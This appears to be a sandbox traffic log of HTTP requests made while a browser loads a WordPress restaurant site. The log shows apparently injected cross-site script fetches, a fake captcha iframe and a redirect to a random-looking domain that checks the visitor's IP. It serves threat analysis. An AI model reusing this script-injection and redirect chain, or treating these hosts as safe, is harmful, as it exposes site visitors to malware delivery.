Source: global traffic	HTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-column.js?ver=1759909476 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/js_composer_theme/assets/js/dist/js_composer_front.min.js?ver=8.6.1 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/jupiter-donut/assets/js/shortcodes-scripts.min.js?ver=1.6.4 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jsrepo?rnd=0.3805456465715724&ts=1760683897314 HTTP/1.1Host: getfix.winConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://thefatshallot.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://thefatshallot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/revslider/sr6/assets/js/rbtools.min.js?ver=6.7.37 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/jupiter/assets/js/core-scripts.6.12.2.js?ver=1759909476 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/revslider/sr6/assets/js/rs6.min.js?ver=6.7.37 HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2013/01/logo1.png HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /?ref=thefatshallot.com HTTP/1.1Host: cptchdm.icuConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://thefatshallot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jsrepo?rnd=0.11634913867038876&ts=1760683896011 HTTP/1.1Host: getfix.winConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jsrepo?rnd=0.3805456465715724&ts=1760683897314 HTTP/1.1Host: getfix.winConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /captcha.html HTTP/1.1Host: cptchdm.icuConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://cptchdm.icu/?ref=thefatshallot.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2018/04/logo21.png HTTP/1.1host: thefatshallot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /1uzGZ4 HTTP/1.1host: 2no.cosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://cptchdm.icu/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /js HTTP/1.1host: tdsworkout.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://thefatshallot.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2019/05/fat-shallot-chicago-tall.jpg HTTP/1.1host: thefatshallot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2025/04/untitled-design-1.png HTTP/1.1host: thefatshallot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2022/02/fat-shallot-gillson-beach.jpg HTTP/1.1host: thefatshallot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2025/04/untitled-design.png HTTP/1.1host: thefatshallot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/02/fat-shallot-merchandise-mart.png HTTP/1.1host: thefatshallot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/jupiter/assets/js/plugins/async/min/jquery.flexslider.js HTTP/1.1host: thefatshallot.comsec-ch-ua-platform: "Windows"x-requested-with: XMLHttpRequestuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://thefatshallot.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2018/06/fatshallottruck.png HTTP/1.1host: thefatshallot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /js/lp.js HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/jquery.min.js HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/header.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/commons.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/modals_commons.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/playlist-base.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/layout.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/widgets-comments.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/show_new.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/pb_block.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/premium-modals.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/w10-bootstrap.min.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/fix.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/browser.js HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/dist.js HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/c.js HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/large_temp.css HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/empty.png HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://xpoalswwkjddsljsy.com/css/commons.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /stats.php HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pingjs/?k=3ck54buj9z&t=CloudFlare&c=c&x=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F&y=&a=0&d=1.81&v=27&r=6351 HTTP/1.1host: whos.amung.ussec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://xpoalswwkjddsljsy.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pingjs/?k=3wcfa1cqds&t=CloudFlare&c=c&x=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F&y=&a=1&d=1.81&v=27&r=20 HTTP/1.1host: whos.amung.ussec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://xpoalswwkjddsljsy.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1host: api.ipify.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://xpoalswwkjddsljsy.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://xpoalswwkjddsljsy.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
